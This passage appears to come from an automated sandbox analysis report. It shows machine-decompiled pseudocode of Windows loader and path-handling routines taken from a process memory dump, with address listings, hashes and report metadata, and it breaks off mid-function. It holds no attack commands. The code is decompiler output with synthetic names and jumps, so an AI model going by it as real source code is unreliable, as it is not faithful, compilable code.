									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01194620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E01196E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M011945F8))) {
												case 0:
													_v568 = 0x1151078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x11511c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01194620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E011BF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E011BF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E011752A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0118EB70(1, 0x12679a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0118AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E011B95D0();
																			L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E011BB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E011B3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E011BB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                                                          0x01194128
                                                                          0x01194135
                                                                          0x0119413c
                                                                          0x01194141
                                                                          0x01194145
                                                                          0x01194147
                                                                          0x0119414e
                                                                          0x01194151
                                                                          0x01194159
                                                                          0x0119415c
                                                                          0x01194160
                                                                          0x01194164
                                                                          0x01194168
                                                                          0x0119416c
                                                                          0x0119417f
                                                                          0x01194181
                                                                          0x0119446a
                                                                          0x0119446a
                                                                          0x0119418c
                                                                          0x01194195
                                                                          0x01194199
                                                                          0x01194432
                                                                          0x01194439
                                                                          0x0119443d
                                                                          0x01194442
                                                                          0x01194447
                                                                          0x00000000
                                                                          0x0119419f
                                                                          0x011941a3
                                                                          0x011941b1
                                                                          0x011941b9
                                                                          0x011941bd
                                                                          0x011945db
                                                                          0x011945db
                                                                          0x00000000
                                                                          0x011941c3
                                                                          0x011941c3
                                                                          0x011941ce
                                                                          0x011941d4
                                                                          0x011de138
                                                                          0x011de13e
                                                                          0x011de169
                                                                          0x011de16d
                                                                          0x011de19e
                                                                          0x011de16f
                                                                          0x011de16f
                                                                          0x011de175
                                                                          0x011de179
                                                                          0x011de18f
                                                                          0x011de193
                                                                          0x00000000
                                                                          0x011de199
                                                                          0x00000000
                                                                          0x011de199
                                                                          0x011de193
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011941da
                                                                          0x011941da
                                                                          0x011941df
                                                                          0x011941e4
                                                                          0x011941ec
                                                                          0x01194203
                                                                          0x01194207
                                                                          0x011de1fd
                                                                          0x01194222
                                                                          0x01194226
                                                                          0x011de1f3
                                                                          0x011de1f3
                                                                          0x0119422c
                                                                          0x0119422c
                                                                          0x01194233
                                                                          0x011de1ed
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01194239
                                                                          0x01194239
                                                                          0x01194239
                                                                          0x01194239
                                                                          0x01194233
                                                                          0x01194226
                                                                          0x011941ee
                                                                          0x011941ee
                                                                          0x011941f4
                                                                          0x01194575
                                                                          0x011de1b1
                                                                          0x011de1b1
                                                                          0x00000000
                                                                          0x0119457b
                                                                          0x0119457b
                                                                          0x01194582
                                                                          0x011de1ab
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01194588
                                                                          0x01194588
                                                                          0x0119458c
                                                                          0x011de1c4
                                                                          0x011de1c4
                                                                          0x00000000
                                                                          0x01194592
                                                                          0x01194592
                                                                          0x01194599
                                                                          0x011de1be
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0119459f
                                                                          0x0119459f
                                                                          0x011945a3
                                                                          0x011de1d7
                                                                          0x011de1e4
                                                                          0x00000000
                                                                          0x011945a9
                                                                          0x011945a9
                                                                          0x011945b0
                                                                          0x011de1d1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011945b6
                                                                          0x011945b6
                                                                          0x011945b6
                                                                          0x00000000
                                                                          0x011945b6
                                                                          0x011945b0
                                                                          0x011945a3
                                                                          0x01194599
                                                                          0x0119458c
                                                                          0x01194582
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011941f4
                                                                          0x0119423e
                                                                          0x01194241
                                                                          0x011945c0
                                                                          0x011945c4
                                                                          0x00000000
                                                                          0x011945ca
                                                                          0x011945ca
                                                                          0x00000000
                                                                          0x011de207
                                                                          0x011de20f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011945d1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x011945ca
                                                                          0x00000000
                                                                          0x01194247
                                                                          0x01194247
                                                                          0x01194247
                                                                          0x01194249
                                                                          0x01194249
                                                                          0x01194249
                                                                          0x01194251
                                                                          0x01194251
                                                                          0x01194257
                                                                          0x0119425f
                                                                          0x0119426e
                                                                          0x01194270
                                                                          0x0119427a
                                                                          0x011de219
                                                                          0x011de219
                                                                          0x01194280
                                                                          0x01194282
                                                                          0x01194456
                                                                          0x011945ea
                                                                          0x00000000
                                                                          0x011945f0
                                                                          0x011de223
                                                                          0x00000000
                                                                          0x011de223
                                                                          0x0119445c
                                                                          0x0119445c
                                                                          0x00000000
                                                                          0x0119445c
                                                                          0x00000000
                                                                          0x01194288
                                                                          0x0119428c
                                                                          0x011de298
                                                                          0x01194292
                                                                          0x01194292
                                                                          0x0119429e
                                                                          0x011942a3
                                                                          0x011942a7
                                                                          0x011942ac
                                                                          0x011de22d
                                                                          0x011942b2
                                                                          0x011942b2
                                                                          0x011942b9
                                                                          0x011942bc
                                                                          0x011942c2
                                                                          0x011942ca
                                                                          0x011942cd
                                                                          0x011942cd
                                                                          0x011942d4
                                                                          0x0119433f
                                                                          0x0119433f
                                                                          0x011942d6
                                                                          0x011942d6
                                                                          0x011942d9
                                                                          0x011942dd
                                                                          0x011942eb
                                                                          0x011de23a
                                                                          0x011942f1
                                                                          0x01194305
                                                                          0x0119430d
                                                                          0x01194315
                                                                          0x01194318
                                                                          0x0119431f
                                                                          0x01194322
                                                                          0x0119432e
                                                                          0x0119433b
                                                                          0x0119433b
                                                                          0x00000000
                                                                          0x0119432e
                                                                          0x011942eb
                                                                          0x0119434c
                                                                          0x0119434e
                                                                          0x01194352
                                                                          0x01194359
                                                                          0x0119435e
                                                                          0x01194361
                                                                          0x0119436e
                                                                          0x0119438a
                                                                          0x0119438e
                                                                          0x01194396
                                                                          0x0119439e
                                                                          0x011943a1
                                                                          0x011943ad
                                                                          0x011943bb
                                                                          0x011943bb
                                                                          0x011943ad
                                                                          0x0119436e
                                                                          0x011943bf
                                                                          0x011943c5
                                                                          0x01194463
                                                                          0x01194463
                                                                          0x011943ce
                                                                          0x011943d5
                                                                          0x011943d9
                                                                          0x011943df
                                                                          0x01194475
                                                                          0x01194479
                                                                          0x01194491
                                                                          0x01194491
                                                                          0x01194479
                                                                          0x011943e5
                                                                          0x011943eb
                                                                          0x011943f4
                                                                          0x011943f6
                                                                          0x011943f9
                                                                          0x011943fc
                                                                          0x011943ff
                                                                          0x011944e8
                                                                          0x011944ed
                                                                          0x011944f3
                                                                          0x011de247
                                                                          0x00000000
                                                                          0x011944f9
                                                                          0x01194504
                                                                          0x01194508
                                                                          0x0119450f
                                                                          0x011de269
                                                                          0x00000000
                                                                          0x01194515
                                                                          0x01194519
                                                                          0x01194531
                                                                          0x01194534
                                                                          0x01194537
                                                                          0x0119453e
                                                                          0x01194541
                                                                          0x0119454a
                                                                          0x011de255
                                                                          0x011de255
                                                                          0x011de25b
                                                                          0x011de25e
                                                                          0x011de261
                                                                          0x011de261
                                                                          0x01194555
                                                                          0x01194559
                                                                          0x0119455d
                                                                          0x011de26d
                                                                          0x011de270
                                                                          0x011de274
                                                                          0x011de27a
                                                                          0x011de27d
                                                                          0x011de28e
                                                                          0x011de28e
                                                                          0x01194563
                                                                          0x01194563
                                                                          0x01194569
                                                                          0x01194569
                                                                          0x00000000
                                                                          0x0119455d
                                                                          0x0119450f
                                                                          0x00000000
                                                                          0x011944f3
                                                                          0x011943ff
                                                                          0x01194405
                                                                          0x01194405
                                                                          0x01194405
                                                                          0x011942ac
                                                                          0x0119428c
                                                                          0x01194282
                                                                          0x01194407
                                                                          0x0119440d
                                                                          0x011de2af
                                                                          0x011de2af
                                                                          0x01194413
                                                                          0x01194413
                                                                          0x00000000
                                                                          0x011941d4
                                                                          0x00000000
                                                                          0x011941c3
                                                                          0x011941bd
                                                                          0x01194415
                                                                          0x01194415
                                                                          0x01194416
                                                                          0x01194417
                                                                          0x01194429
                                                                          0x0119416e
                                                                          0x0119416e
                                                                          0x01194175
                                                                          0x01194498
                                                                          0x0119449f
                                                                          0x011de12d
                                                                          0x00000000
                                                                          0x011de133
                                                                          0x00000000
                                                                          0x011de133
                                                                          0x011944a5
                                                                          0x011944a5
                                                                          0x011944aa
                                                                          0x00000000
                                                                          0x011944bb
                                                                          0x011944ca
                                                                          0x011944d6
                                                                          0x011944d7
                                                                          0x011944d8
                                                                          0x011944e3
                                                                          0x011944e3
                                                                          0x011944aa
                                                                          0x0119417b
                                                                          0x0119417b
                                                                          0x0119417b
                                                                          0x00000000
                                                                          0x0119417b
                                                                          0x01194175
                                                                          0x00000000

                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 85c5eda4dc3dd0508640b180a7e30b5c2f12d2c28844bec179c1edbeffeadc80
                                                                          • Instruction ID: 1fb68a7f9e259738998d25ba77de810dc0af395515b1bb39e0e5fc3c1a836439
                                                                          • Opcode Fuzzy Hash: 85c5eda4dc3dd0508640b180a7e30b5c2f12d2c28844bec179c1edbeffeadc80
                                                                          • Instruction Fuzzy Hash: FEF19F706082118FDB2CCF68C580A7AB7E1FF98714F05496EF5A6CBA50E734D992CB52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0118D5E0, Relevance: .4, Instructions: 353COMMONCrypto
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 87%
                                                                          			E0118D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x126d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E01186600(0x12652d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1267b9c; // 0x0
							_t281 = L01194620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E011BF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1267b90; // 0x772a0000
								if(_t384 == 0) {
									_t353 =  *0x1267b8c; // 0xd02b30
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E01192280(_t200, 0x12684d8);
									_t277 =  *0x12685f4; // 0xd03020
									_t351 =  *0x12685f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xd02fb8
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0118FFB0(_t287, _t353, 0x12684d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E011CCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E01186600(0x12652d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E01187926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x126b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E011FE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1268472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x126b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x126b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E01192280(_t250, 0x12684d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L011B3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0118FFB0(_t293, _t353, 0x12684d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E011B37F5(_t353, 0);
																}
																E011B0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E011A9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E011A02D6(_t174);
																}
																L011977F0( *0x1267b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E011AC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0118EC7F(_t353);
										L011A19B8(_t287, 0, _t353, 0);
										_t200 = E0117F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x126b2f8 |  *0x126b2fc) == 0 || ( *0x126b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E011BB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x126b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
										_t208 = E01226B68(_v168,  &_v208, _v168, __eflags);
										__eflags = _t208 - 1;
										if(_t208 == 1) {
											goto L46;
										} else {
											__eflags = _v208 & 0x00000010;
											if((_v208 & 0x00000010) == 0) {
												goto L46;
											} else {
												_t342 = 4;
												_t366 = E01226AEB(_t355, 4,  &_v216);
												__eflags = _t366;
												if(_t366 >= 0) {
													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E0118E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L0118EAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E011B9730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
